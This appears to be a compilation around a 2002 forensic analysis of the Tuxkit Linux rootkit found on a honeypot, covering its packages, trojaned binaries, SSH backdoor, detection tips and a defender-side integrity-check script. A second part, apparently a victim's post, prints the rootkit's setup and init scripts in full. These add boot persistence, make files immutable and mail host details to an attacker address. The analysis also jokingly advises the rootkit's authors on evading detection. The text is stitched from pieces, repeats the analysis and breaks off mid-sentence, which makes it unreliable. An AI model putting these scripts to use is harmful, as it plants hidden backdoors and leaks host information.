The Tuxtendo's Tuxkit Rootkit Analysis
spoonfork / mel@ini2.net
March 2002
--] Introduction
The following is an analysis of the Tuxkit rootkit, written by a Dutch group
called Tuxtendo. This rootkit was found in one of the honeypots that we
set up. The honeypot was a stock installation of Redhat 7.0 with a few
services running. None of the software, such as named, sendmail and the
printer daemon, was patched.
There are three versions of the rootkit available on Tuxtendo's website:
tuxkit.tgz, tuxkit-1.0.tgz, and tuxkit-short.tgz. Both tuxkit.tgz and
tuxkit-1.0.tgz have the same contents, while tuxkit-short.tgz contains
fewer tools.
I've also tested some of tuxkit's binaries on Redhat 7.1, and they seemed to
work fine.
The following are the contents of each tuxkit. This analysis will focus on
tuxkit-1.0.tgz, the one that was found on our honeypot. The rootkit was
developed by Argv[], possibly modified from and based on the t0rn rootkit. The
timestamp of the rootkit was December 2001. Googling for "tuxkit analysis"
did not produce any hits, so I guess that this rootkit is pretty new.
NOTE: chkrootkit failed to detect tuxkit.
--] Packages
[root@angel tuxkit-1.0]# ls -l ../tuxkit (tuxkit.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-1.0 (tuxkit-1.0.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-short (tuxkit-1.0-short.tgz)
total 1556
-rw------- 1 1001 1001 502884 Dec 5 07:55 bin.tgz
-rw------- 1 1001 1001 406 Dec 5 07:55 cfg.tgz
-rw------- 1 1001 1001 16213 Dec 5 07:55 lib.tgz
-rw------- 1 1001 1001 3684 Dec 5 07:55 README
-rw------- 1 1001 1001 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 1001 1001 577089 Jan 6 01:12 tools.tgz
-rwx------ 1 1001 1001 9489 Jan 6 00:53 tuxkit
--] tuxkit-1.0.tgz
There are six files in the tuxkit, which include a README, an installation
script, and four tarred and gzipped archives.
The following are the contents of the individual files in the tuxkit.
- bin.tgz - contains precompiled trojan binaries
- cfg.tgz - contains tuxkit's configuration files
- lib.tgz - contains libproc libraries, for process hiding purposes
- sshd.tgz - contains precompiled sshd, complete with sshd_config
- tools.tgz - contains an arsenal of tools (duh!) for the skripkids
who don't know how to get their own tools. The tools are:
[root@angel tools]# ls -la
total 44
drwxr-xr-x 11 root root 4096 Mar 1 13:14 .
drwxr-xr-x 4 root root 4096 Mar 1 13:14 ..
drwx------ 2 root root 4096 Nov 12 20:50 bitchx
drwx------ 2 root root 4096 Dec 12 23:59 dos
drwx------ 2 root root 4096 Nov 12 20:57 mirkforce
drwx------ 2 root root 4096 Nov 12 20:57 nmapv
drwx------ 8 root root 4096 Nov 12 23:05 psybnc
drwx------ 2 root root 4096 Nov 13 01:00 sniffer
drwx------ 2 root root 4096 Nov 12 20:58 ssh
drwx------ 2 root root 4096 Nov 12 23:22 synscan
drwx------ 2 root root 4096 Nov 12 20:58 utils
The names of these tools are self-explanatory. However, they are all
precompiled. utils contains only one utility - wget. This is to
enable the skripkids to easily download other tools (assuming the skripkids
know how to use wget).
- tuxkit - an installation script
- README - the obligatory README file (and greetz, of course)
The tuxkit is very similar to the t0rn rootkit. The addition of
precompiled tools such as nmap, synscan and psybnc makes it a handier
rootkit. It is flawlessly easy to install. Tuxkit is like a pack-n-go
kinda tool. The appendix shows the contents of each package in tuxkit.
--] Installation
Installation of tuxkit is very straightforward. The README says:
---README snip---
./tuxkit <Password> <SSHD Port> <BNC Port>
Password  : This will be the password you need to login onto
            the compromised system.
SSHD Port : This will be the port on which the SSHD will be
            listening on for incoming connections.
            This port will be hidden automatically in netstat.
bncport   : this will be the port psyBNC will listen on.
            This port will be hidden automatically in netstat.
The setup script does NOT have default settings, this forces you to
provide a password, sshd and bnc ports.
The setup script also contains a variable called EMAIL, you should edit
this.
---README snip---
This sets tuxkit apart from t0rn: it does not use default ports.
The default installation directory is /dev/tux. Shell-script-savvy skripkids
may want to change this to avoid detection.
NOTE: the tuxkit installation script contains a variable EMAIL whose
default value is the author's address. At the end of the installation, the
script will send an e-mail with the subject "Tuxkit1.0". The e-mail contains
information about the host, the SSH backdoor port, the psyBNC port, and
also the password. If you, skripkid, didn't change the EMAIL (the README
clearly states to change this), you run the risk of your server being
owned by other people.
--] Trojaning process
The trojaning process is straightforward. syslogd is killed first. Then
all the files that came with tuxkit-1.0.tgz are untarred and unzipped.
The installation directory is created. The default installation directory
is /dev/tux, and even though this is kept in the variable RDIR, the tuxkit
install script hardcodes "mkdir /dev/tux", so changing RDIR but forgetting
to change that line will skew your installation a bit (most skripkids won't
bother to do this anyway). In fact, /dev/tux is hardcoded almost everywhere
in the installation script.
The hidden files .addr, .cron, .file, .log and .proc are copied to /dev/tux/.
The library files are copied to lib, and /sbin/ldconfig is executed.
This step is followed by copying the files to be trojaned to /dev/tux/backup
and replacing them with the trojaned versions. A script "sz", which is part
of bin.tgz, is run against each trojaned binary so that its size matches
that of the original binary. "sz" basically pads the trojan with zeros
(from /dev/zero).
--] Backdooring process
The backdoored SSH is installed as /usr/bin/xsf. The trojaned sshcheck is
installed as /usr/bin/xchk. Both are invoked the following way:
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
/usr/bin/xchk -q 1>/dev/null 2>/dev/null
The /etc/rc.d/rc.sysinit is also edited to include the following lines:
echo "# Running Xsf ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xsf -q 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
echo "# Running Xchk ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xchk 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
If you run strings on xsf, you will be able to get the passwords that the
skripkid used.
--] The tuxkit configuration files
The tuxkit config files follow the convention of the original Linux rootkit.
There are .addr, .cron, .file, .log and .proc; the filenames are
self-explanatory. In forensics, what you will be interested in most is the
.addr file, because it contains the IPs that netstat is supposed to hide.
--] Detecting tuxkit
Detecting tuxkit is fairly simple.
1. Look for the existence of /dev/tux
2. Run lsof -i +M | grep xsf
Hey, why wasn't lsof trojaned? t0rn has a trojaned lsof.
--] Detecting tuxkit - trojans
1. md5sums - if you've kept an md5sum of the virgin state of your
installation, detecting trojans should be a walk in the park. Every
system administrator should use a file integrity checker to monitor
critical file changes.
2. Look for /usr/bin/xsf and /usr/bin/xchk
3. Look for extra lines in /etc/rc.sysinit
4. cd /etc/ssh; ls -l. The trojaned ls will return nothing, when in
fact your ssh config files are still there.
The following are the size differences between the tuxkit and Redhat 7.1
binaries (before installation).
files        tuxkit    Redhat 7.1
------------------------------------------
crontab      29052     21280
df           27112     26812
dir          42952     45948
dmesg        3640      4252
du           25592     25788
find         55220     47516
ifconfig     36356     51164
killall      14400     12096
locate       9144      25020  (symlink to slocate)
login        3980      17740
ls           42952     45948
netstat      58228     83132
ps           62748     63180
pstree       14532     12284
sshcheck     89828     -      (my test machine doesn't have this)
sshdconfig   451260    -      (my test machine doesn't have this)
syslogd      28324     26972
tcpd         18660     24844
top          37844     34924
updatedb     4394      25020  (symlink to slocate)
vdir         42952     45948
This result is quite interesting. Trojans are not supposed to be bigger than
the original binaries!
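Two defender-side checks for what the Trojaning and Detecting sections describe, as an added example in Python (not code from spoonfork's analysis or from tuxkit): a size-plus-md5 comparison against a recorded clean baseline, and a heuristic for the "sz" trick, which pads a smaller trojan with bytes from /dev/zero until it is the size of the original. The ELF samples are constructed in memory, and the 64-byte slack threshold is an assumption of this example.

```python
import hashlib
import struct

ELF_MAGIC = b"\x7fELF"
PAD_THRESHOLD = 64   # assumed heuristic: legitimate slack after the shdr table is tiny


def elf_logical_end(data: bytes):
    """Offset just past the section header table, which in a normally linked
    ELF is the last thing in the file. Handles ELF32/ELF64, LSB/MSB.
    Returns None when there is no section header table to go by."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                      # EI_CLASS: 1 = ELF32, 2 = ELF64
    endian = "<" if data[5] == 1 else ">"    # EI_DATA:  1 = LSB,   2 = MSB
    if is64:
        (e_shoff,) = struct.unpack_from(endian + "Q", data, 0x28)
        e_shentsize, e_shnum = struct.unpack_from(endian + "HH", data, 0x3A)
    else:
        (e_shoff,) = struct.unpack_from(endian + "I", data, 0x20)
        e_shentsize, e_shnum = struct.unpack_from(endian + "HH", data, 0x2E)
    if e_shnum == 0:
        return None
    return e_shoff + e_shentsize * e_shnum


def trailing_nul_padding(data: bytes):
    """Count of NUL bytes that trail the logical end of the ELF file, i.e.
    the signature sz leaves when it pads a trojan from /dev/zero.
    None means the end could not be determined (no shdrs, or truncated)."""
    end = elf_logical_end(data)
    if end is None or end > len(data):
        return None
    slack = data[end:]
    # Only a pure NUL tail counts; other appended data is not sz's pattern.
    return len(slack) - len(slack.rstrip(b"\x00"))


def md5sum(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def audit(baseline: dict, current: dict) -> list:
    """baseline: name -> (size, md5) recorded on the clean install.
    current:  name -> bytes read from the suspect system.
    Returns one finding per anomaly; an empty list means nothing changed."""
    findings = []
    for name, (size, digest) in sorted(baseline.items()):
        data = current.get(name)
        if data is None:
            findings.append(f"{name}: missing")
            continue
        if md5sum(data) != digest:
            if len(data) == size:
                # Exactly what sz is for: a size check alone would pass.
                findings.append(f"{name}: md5 mismatch, size unchanged")
            else:
                findings.append(f"{name}: md5 mismatch, size {size} -> {len(data)}")
        pad = trailing_nul_padding(data)
        if pad is not None and pad >= PAD_THRESHOLD:
            findings.append(f"{name}: {pad} NUL bytes after ELF end (sz-style padding)")
    return findings


def build_elf64(body: bytes, pad: int = 0) -> bytes:
    """Constructed sample: a minimal ELF64 (header, fake code body, one
    SHT_NULL section header) followed by `pad` NUL bytes as sz would append."""
    shoff = 64 + len(body)
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8      # 64-bit, LSB, v1
    header = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        2, 0x3E, 1,            # e_type ET_EXEC, e_machine x86-64, e_version
        0x400078, 64, shoff,   # e_entry, e_phoff, e_shoff
        0, 64, 56, 0,          # e_flags, e_ehsize, e_phentsize, e_phnum
        64, 1, 0,              # e_shentsize, e_shnum, e_shstrndx
    )
    return header + body + b"\x00" * 64 + b"\x00" * pad


def demo() -> list:
    """Baseline from the 'virgin' binaries, then two trojans: ls padded by sz
    to the original size, and find simply bigger, as in the size table."""
    original = build_elf64(b"\x90" * 3000)                # 3128 bytes
    baseline = {"ls": (len(original), md5sum(original)),
                "find": (len(original), md5sum(original))}
    trojan_ls = build_elf64(b"\xcc" * 1000, pad=2000)     # also 3128 bytes
    trojan_find = build_elf64(b"\xcc" * 4000)             # 4128 bytes
    return audit(baseline, {"ls": trojan_ls, "find": trojan_find})


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```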
--] Detecting tuxkit - if you are lucky
On our honeypot, the trojaned 'ps' still shows xsf, even though xsf was in
the list of processes to be hidden. However, 'ls' seems to work very well
in hiding files.
--] Recommendations
For tuxkit developers
- Add a trojaned lsof. Borrow one from t0rn. Also, fix ps.
- tools.tgz is probably not needed. A skripkid who is able to crack a Linux
machine (duh) should be able to download and compile his/her own tools.
Furthermore, tools.tgz adds unnecessary extra bytes to the tuxkit, not
really convenient for downloading.
- Add a self-deleting script, i.e. delete the tar files and installation
directory after installation. Skripkids seem incapable of doing this.
The config files should be kept somewhere other than /dev/tux.
For skripkidz - vi tuxkit, type the following:
:%s///dev//tux/installation_dir_of_your_choice/g
where installation_dir_of_your_choice is, uh, the installation directory
of your choice. (However, this won't work, since /dev/tux/.{addr,proc}, etc.
are already hardcoded into the binaries, so hehe, just run ./tuxkit and pray
that the stupid system administrators won't notice.)
For system administrators - run a file integrity checker after each fresh
install.
--] Conclusion
The world of forensic analysis ain't fun without rootkits.
--] Appendix - Contents of each package
[root@angel tuxkit-1.0]# less bin.tgz
-rwx------ root/root 29052 2001-12-26 21:37:57 bin/crontab
-rwx------ root/root 27112 2001-12-26 21:37:57 bin/df
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/dir
-rwx------ root/root 3640 2001-12-26 21:37:57 bin/dmesg
-rwx------ root/root 25592 2001-12-26 21:37:57 bin/du
-rwx------ root/root 55220 2001-12-26 21:37:57 bin/find
-rwx------ root/root 36356 2001-12-26 21:37:57 bin/ifconfig
-rwx------ root/root 14400 2001-12-26 21:37:57 bin/killall
-rwx------ root/root 9144 2001-12-26 21:37:57 bin/locate
-rwx------ root/root 3980 2001-12-26 21:37:57 bin/login
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/ls
-rwx------ root/root 58228 2001-12-26 21:37:57 bin/netstat
-rwx------ root/root 62748 2001-12-26 21:37:57 bin/ps
-rwx------ root/root 14532 2001-12-26 21:37:57 bin/pstree
-rwx------ root/root 89828 2001-12-26 21:37:57 bin/sshcheck
-rwx------ root/root 451260 2001-12-26 21:37:57 bin/sshdconfig
-rwx------ root/root 28324 2001-12-26 21:37:57 bin/syslogd
-rwx------ root/root 1522 2001-12-26 21:37:57 bin/sz
-rwx------ root/root 18660 2001-12-26 21:37:57 bin/tcpd
-rwx------ root/root 37844 2001-12-26 21:37:57 bin/top
-rwx------ root/root 4394 2001-12-26 21:37:57 bin/updatedb
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/vdir
[root@angel tuxkit-1.0]# less cfg.tgz
-rw------- root/root 17 2001-11-11 19:12:19 cfg/.addr
-rw------- root/root 69 2001-11-12 23:06:32 cfg/.cron
-rw------- root/root 67 2001-12-27 20:54:23 cfg/.file
-rw------- root/root 13 2001-12-27 20:54:47 cfg/.log
-rw------- root/root 116 2001-12-27 20:55:29 cfg/.proc
[root@angel tuxkit-1.0]# less sshd.tgz
-rw------- virus/virus 828 2001-12-13 00:22:12 ssh2/hostkey
-rw------- virus/virus 697 2001-12-13 00:22:12 ssh2/hostkey.pub
-rw------- virus/virus 503 2001-12-27 20:43:12 ssh2/logo
-rw------- virus/virus 512 2001-12-13 23:51:33 ssh2/random_seed
-rwx------ virus/virus 1040220 2002-01-06 00:05:58 ssh2/sshd
-rw------- virus/virus 647 2001-12-27 22:42:20 ssh2/sshd2_config
[root@angel tuxkit-1.0]# less lib.tgz
lrwxrwxrwx root/root 0 2001-11-11 02:49:02 lib/libproc.so -> libproc.so.2.0.7
################end###################
tuxkit created the /dev/tux directory on my machine. It contains five hidden files, .addr, .cron, .file, .log and .proc, holding tuxkit's configuration information.
It created a /usr/sbin directory on my machine, containing three files: tux, tux2w3c and tuxstat.
It also created three directories under /lib, tools, ssh2 and bin, to hold the tools it uses.
And under /lib it created four files: init, iplook, sk and setup. Let's take a look:
Contents of setup:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com"   # (poster's remark: so this is the guy?!!!!)
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "Installing the muie !"
chattr -saui /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
rm -rf /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
cp sk /usr/bin/nfs
cp sk /dev/ntfs
cp init /etc/rc.d/init.d/
chattr +saui /usr/bin/nfs /dev/ntfs /etc/rc.d/init.d/init
/etc/rc.d/init.d/init
chattr -saui /etc/rc.d/rc
chattr -saui /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
echo "# init script" >>/etc/rc.d/rc
echo "# init script" >>/etc/rc.d/rc.local
echo "# init script" >>/etc/rc.d/rc.sysinit
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.local
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.sysinit
chattr +saui /etc/rc.d/rc /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
#echo -e " $MYIP # `hostname -f`" | mail -s skrootkit $EMAIL
echo "Done"
cp iplook /usr/bin
chattr +saui /usr/bin/iplook
iplook
echo "----------------------------------------------"
echo -e "System information"
echo -e " Hostname : `hostname -f`"
echo -e " IP address : $MYIP `hostname -i`"
echo -e " Alt IPs : `/sbin/ifconfig | grep eth | wc -l`"
echo -e " Bogomips : `cat /proc/cpuinfo | grep bogomips | awk '{printf $3}'`"
if [ -f /etc/*release ]; then
echo -e " Distribution : `head -1 /etc/*release`"
fi
echo -e " Uptime : `uptime`"
rm -rf skrootkit.tgz
sk
init
iplook
rm -rf setup
Contents of iplook:
#!/bin/bash
#
#########################################################################
# -- Echipa 1337 -- #
# #
# Coder: agressor (Echipa 1337). #
# E-Mail: agressor@1337.ro #
# Acest script va arata ip (de retea si eventual de internet) #
# Scriptul poate fi foarte folositor, #
# mai ales pentru cei care au alocate IP Dinamice. #
# #
#########################################################################
#
/sbin/ifconfig | grep "inet addr" | grep -v "127.0.0.1" | /
awk '{print $2;}' | awk -F':' '{print $2;}'
Contents of init:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com"
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
if [ -x /usr/bin/nfs ]
then
chattr +saui /usr/bin/nfs
else
cp /dev/ntfs /usr/bin/nfs
chattr +saui /usr/bin/nfs /dev/ntfs
fi
nfs &
nfs i `/sbin/pidof nfs`
echo -e " $MYIP # `hostname -f`" | mail -s reboot $EMAIL
Unlike what the analysis above describes, it did not modify my /etc/rc.d/rc.sysinit; instead it changed my /etc/rc.d/rc.local directly into this:
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
#/usr/bin/init
# Running Xsf ...
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
# Running Xchk ...
/usr/bin/xchk 1>/dev/null 2>/dev/null
But I did not find the two files xsf and xchk.
After the intrusion tuxkit sets up an ssh backdoor. But I have not figured out how it got installed on my machine. Was it through a wuftp vulnerability or an openssh one?
I have already upgraded the machine from 2.4.10 to 2.4.18. Now I don't seem to see any suspicious processes:
ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Sep19 ? 00:00:06 init
root 2 1 0 Sep19 ? 00:00:00 [migration_CPU0]
root 3 1 0 Sep19 ? 00:00:00 [migration_CPU1]
root 4 1 0 Sep19 ? 00:00:00 [migration_CPU2]
root 5 1 0 Sep19 ? 00:00:00 [migration_CPU3]
root 6 1 0 Sep19 ? 00:00:00 [keventd]
root 7 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU0]
root 8 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU1]
root 9 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU2]
root 10 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU3]
root 11 1 0 Sep19 ? 00:00:07 [kswapd]
root 12 1 0 Sep19 ? 00:00:09 [bdflush]
root 13 1 0 Sep19 ? 00:00:01 [kupdated]
root 14 1 0 Sep19 ? 00:00:00 [mdrecoveryd]
root 20 1 0 Sep19 ? 00:00:00 [aacraid]
root 21 1 0 Sep19 ? 00:00:00 [scsi_eh_0]
root 26 1 0 Sep19 ? 00:00:01 [kjournald]
root 77 1 0 Sep19 ? 00:00:00 [khubd]
root 151 1 0 Sep19 ? 00:00:00 [kjournald]
root 152 1 0 Sep19 ? 00:00:00 [kjournald]
root 153 1 0 Sep19 ? 00:00:00 [kjournald]
root 154 1 0 Sep19 ? 00:00:02 [kjournald]
root 155 1 0 Sep19 ? 00:00:07 [kjournald]
rpc 643 1 0 Sep19 ? 00:00:00 portmap
rpcuser 662 1 0 Sep19 ? 00:00:00 rpc.statd
root 751 1 0 Sep19 ? 00:00:01 /usr/sbin/sshd
root 785 1 0 Sep19 ? 00:00:00 rpc.rquotad
root 789 1 0 Sep19 ? 00:00:00 [nfsd]
root 790 1 0 Sep19 ? 00:00:00 [nfsd]
root 791 1 0 Sep19 ? 00:00:00 [nfsd]
root 792 1 0 Sep19 ? 00:00:00 [nfsd]
root 793 1 0 Sep19 ? 00:00:00 [nfsd]
root 794 1 0 Sep19 ? 00:00:00 [nfsd]
root 795 1 0 Sep19 ? 00:00:00 [nfsd]
root 796 1 0 Sep19 ? 00:00:00 [nfsd]
root 797 1 0 Sep19 ? 00:00:00 [lockd]
root 798 797 0 Sep19 ? 00:00:00 [rpciod]
root 804 1 0 Sep19 ? 00:00:00 rpc.mountd
root 813 1 0 Sep19 ? 00:00:00 gpm -t ps/2 -m /dev/mouse
bin 823 1 0 Sep19 ? 00:00:00 cannaserver -syslog -u bin
root 832 1 0 Sep19 ? 00:00:00 crond
xfs 891 1 0 Sep19 ? 00:00:00 xfs -droppriv -daemon
daemon 909 1 0 Sep19 ? 00:00:00 /usr/sbin/atd
oracle 983 1 0 Sep19 ? 00:00:20 ora_pmon_rnet
oracle 985 1 0 Sep19 ? 00:00:07 ora_dbw0_rnet
oracle 987 1 0 Sep19 ? 00:00:18 ora_lgwr_rnet
oracle 989 1 0 Sep19 ? 00:00:30 ora_ckpt_rnet
oracle 991 1 0 Sep19 ? 00:00:01 ora_smon_rnet
oracle 993 1 0 Sep19 ? 00:00:00 ora_reco_rnet
oracle 995 1 0 Sep19 ? 00:00:00 ora_arc0_rnet
oracle 1034 1 0 Sep19 ? 00:00:04 /usr/oracle/product/8.17/bin/tns
root 1053 1 0 Sep19 ? 00:00:01 /usr/NetVault6/bin/nvpmgr
root 1054 1053 0 Sep19 ? 00:00:00 nvcmgr 2
root 1058 1 0 Sep19 tty2 00:00:00 /sbin/mingetty tty2
root 1059 1 0 Sep19 tty3 00:00:00 /sbin/mingetty tty3
root 1060 1 0 Sep19 tty4 00:00:00 /sbin/mingetty tty4
root 1061 1 0 Sep19 tty5 00:00:00 /sbin/mingetty tty5
root 1062 1 0 Sep19 tty6 00:00:00 /sbin/mingetty tty6
root 1065 1053 0 Sep19 ? 00:00:03 nvnmgr 3
root 1315 1 0 Sep19 tty1 00:00:00 /sbin/mingetty tty1
root 30764 1 0 Sep22 ? 00:00:00 xinetd -stayalive -reuse -pidfil
root 4993 751 0 12:00 ? 00:00:00 /usr/sbin/sshd
root 4995 4993 0 12:00 pts/0 00:00:00 -bash
root 5145 1 0 12:10 ? 00:00:00 syslogd -m 0
root 5149 1 0 12:10 ? 00:00:00 klogd -x
spoonfork / mel@ini2.net
March 2002
--] Introduction
The following is an analysis of the Tuxkit rootkit, written by a Dutch group
called Tuxtendo. This rootkit was found in one of the honeypots that we
set up. The honeypot was a stock installation of Redhat 7.0, with a few
services running. None of the software, such as named, sendmail and the
printer daemon were patched.
There are three versions of the rootkit that are available on
Tuxtendo's website. They are tuxkit.tgz, tuxkit-1.0.tgz, and tuxkit-short.tgz.
Both tuxkit.tgz and tuxkit-1.0.tgz have the same contents, while
tuxkit-short.tgz contains less tools.
I've also tested some of tuxkit's binaries on Redhat 7.1, and they seemed to
work fine.
The following are the contents of each tuxkit. This analysis will focus on
tuxkit-1.0.tgz, the one that was found on our honeypot. The rootkit was
developed by Argv[], possibly modified from and based on the t0rn rootkit. The
timestamp of the rootkit was December 2001. Googling for "tuxkit analysis"
did not produce any hits, so I guess that this rootkit is pretty new.
NOTE: chkrootkit failed to detect tuxkit.
--] Packages
[root@angel tuxkit-1.0]# ls -l ../tuxkit (tuxkit.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-1.0 (tuxkit-1.0.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-short (tuxkit-1.0-short.tgz)
total 1556
-rw------- 1 1001 1001 502884 Dec 5 07:55 bin.tgz
-rw------- 1 1001 1001 406 Dec 5 07:55 cfg.tgz
-rw------- 1 1001 1001 16213 Dec 5 07:55 lib.tgz
-rw------- 1 1001 1001 3684 Dec 5 07:55 README
-rw------- 1 1001 1001 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 1001 1001 577089 Jan 6 01:12 tools.tgz
-rwx------ 1 1001 1001 9489 Jan 6 00:53 tuxkit
--] tuxkit-1.0.tgz
There are six files in the tuxkit which includes a README, an installation
script, and four tarred/zipped files.
The following are the contents of the individual files in the tuxkit.
- bin.tgz - contains precompiled trojan binaries
- cfg.tgz - contains tuxkit's configuration files
- lib.tgz - contains libproc libraries, for process hiding purposes
- sshd.tgz - contains precompiled sshd, complete with sshd_config
- tools.tgz - contains an arsenal of tools (duh!) for the skrip kiddie
who don't know how to get their own tools. The tools are:
[root@angel tools]# ls -la
total 44
drwxr-xr-x 11 root root 4096 Mar 1 13:14 .
drwxr-xr-x 4 root root 4096 Mar 1 13:14 ..
drwx------ 2 root root 4096 Nov 12 20:50 bitchx
drwx------ 2 root root 4096 Dec 12 23:59 dos
drwx------ 2 root root 4096 Nov 12 20:57 mirkforce
drwx------ 2 root root 4096 Nov 12 20:57 nmapv
drwx------ 8 root root 4096 Nov 12 23:05 psybnc
drwx------ 2 root root 4096 Nov 13 01:00 sniffer
drwx------ 2 root root 4096 Nov 12 20:58 ssh
drwx------ 2 root root 4096 Nov 12 23:22 synscan
drwx------ 2 root root 4096 Nov 12 20:58 utils
The names of these tools are self-explanatory. However, they are all
precompiled. utils contains only one utility - wget. This is to
enable the skripkids to easily download other tools (assuming the skripkids
know how to use wget).
- tuxkit - an installation script
- README - the obligatory README file (and greetz, of course)
The tuxkit is almost similar to the t0rn rootkit. The addition of the
precompiled tools such as nmap, synscan and psybnc makes it a more handy
rootkit. It is flawlessly easy to install. Tuxkit is like a pack-n-go
kinda tool. The appendix shows the contents of each packages in tuxkit.
--] Installation
Installation of tuxkit is very straightforward. The README says:
---README snip---
./tuxkit <Password> <SSHD Port> <BNC Port>
Password : This will be the password you need to login onto
the comromised system.
SSD Port : This will be the port on which the SSHD will be
be listening on for incoming connections.
This port will be hidden automatically in netstat.
bncport : this will be the port psyBNC will listen on.
This port will be hidden automatically in netstat.
The setup script does NOT have default settings, this forces you to
provide a password, sshd and bnc ports.
The setup script also contains a variable called EMAIL, you should edit
this
---README snip---
This sets tuxkit apart from t0rn - it does not use default ports.
The default installation directory is /dev/tux. Shell script savvy skripkids
may want to change this to avoid detection.
NOTE: the tuxkit installationn script contains a variable EMAIL which has
the default value of the author. At the end of the installation, the script
will send an email which the subject "Tuxkit1.0". The e-mail contains
information about the host, the SSH backdoor port, the psyBNC port, and
also the password. If you skripkid didn't change the EMAIL (the README
clearly states to change this), you have the risk of your server being
owned by other people.
--] Trojaning process
The trojaning process is straightforward. syslogd is killed first. Then
all the files that came with tuxkit-1.0.tgz are untarred and upzipped.
The installation directory is created. The default installation directory
is /dev/tux, and even though this is kept as the variable RDIR, the tuxkit
install script hardcoded "mkdir /dev/tux", thus changing RDIR, but forgetting
to change the line above will cause your installation to skew a bit (most
skripkids won't bother to do this anyway). In fact, /dev/tux is hardcoded
almost everywhere in the installation script.
The hidden files .addr, .cron, .file, .log and .proc are copied to /dev/tux/
The library files are copied to lib, and /sbin/ldconfig is executed.
This step is followed by copying files to be trojaned to /dev/tux/backup, and
replacing these files with the trojaned version. A script "sz", which is part
of the bin.tgz is run against each trojaned binaries so that the size matches
that of the original binaries. "sz" basically pads the trojan with zeros
(from /dev/zero).
--] Backdooring process
The backdoored SSH is installed in /usr/bin/xsf. The trojaned sshcheck is
installed in /usr/bin/xchk. Both are invoked the following way:
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
/usr/bin/xchk -q 1>/dev/null 2>/dev/null
The /etc/rc.d/rc.sysinit is also edited to include the following lines:
echo "# Running Xsf ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xsf -q 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
echo "# Running Xchk ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xchk 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
If you string xsf, you will be able to get the passwords that the skripkid
used.
--] The tuxkit configuration files
The tuxkit config files follows that of the original Linux rootkit. There are
